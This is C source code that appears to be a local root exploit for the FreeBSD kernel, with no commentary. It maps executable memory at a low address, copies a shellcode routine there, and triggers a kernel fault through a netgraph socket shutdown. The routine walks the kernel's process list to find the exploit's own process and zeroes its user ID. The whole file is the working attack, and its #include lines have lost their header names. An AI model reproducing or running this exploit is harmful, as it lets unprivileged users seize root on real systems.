#include #include #include #include #include #include #include #include #include #include #include #include #define PAGES 1 #define PATTERN1 0x8f8f8f8f #define PATTERN2 0x6e6e6e6e typedef unsigned long ulong; typedef unsigned char uchar; int x(void) { struct proc * p = 0x0; uint * i; uint *base = (uint *)0xc0000000; while(1) { if ( /* allproc_lock */ (*base & 0xc0000000) == 0xc0000000 && (*(base+1) & 0xc0000000) == 0xc0000000 && (*(base+2) & 0xc0000000) == 0xc0000000 && (*(base+3) == 0x003b0000) && (*(base+7) == 0x00000001) && /* proctree_lock */ (*(base+16) & 0xc0000000) == 0xc0000000 && (*(base+17) & 0xc0000000) == 0xc0000000 && (*(base+18) & 0xc0000000) == 0xc0000000 && (*(base+19) == 0x003b0000) && (*(base+23) == 0x00000001) && /* pargs_ref_lock */ (*(base+32) & 0xc0000000) == 0xc0000000 && (*(base+33) & 0xc0000000) == 0xc0000000 && (*(base+34) & 0xc0000000) == 0xc0000000 && (*(base+35) == 0x00030000) && (*(base+39) == 0x00000004) && /* ppeers_lock */ (*(base+48) & 0xc0000000) == 0xc0000000 && (*(base+49) & 0xc0000000) == 0xc0000000 && (*(base+50) & 0xc0000000) == 0xc0000000 && (*(base+51) == 0x00030000) && (*(base+55) == 0x00000004) && /* allproc */ (*(base+57) & 0xc0000000) == 0xc0000000 && (*(base+58) == 0x0) ) { base = base+57; break; } base++; } p = (struct proc *)base; while(1) { if(p->p_pid == PATTERN2) { i = (uint * )p->p_ucred; *++i = 0; break; } p = p->p_list.le_next; } return 1; } int main(int argc, char * argv[]) { ulong addr; uchar * c; uchar * d; uint * i; void * v; int pid; int s; v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0); if(v == MAP_FAILED) { perror("mmap"); return 0; } c = v; d = (uchar * )x; while(1) { *c = *d; if(*d == 0xc3) { break; } d++; c++; } *c++ = 0xc3; c=v; pid = getpid(); while(1) { if(*(long * )c == PATTERN2) { *(c + 0) = pid >> 0; *(c + 1) = pid >> 8; *(c + 2) = pid >> 16; *(c + 3) = pid >> 24; break; } c++; } s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if(s < 0) { perror("socket"); return 1; } shutdown(s, SHUT_RDWR); return 0; }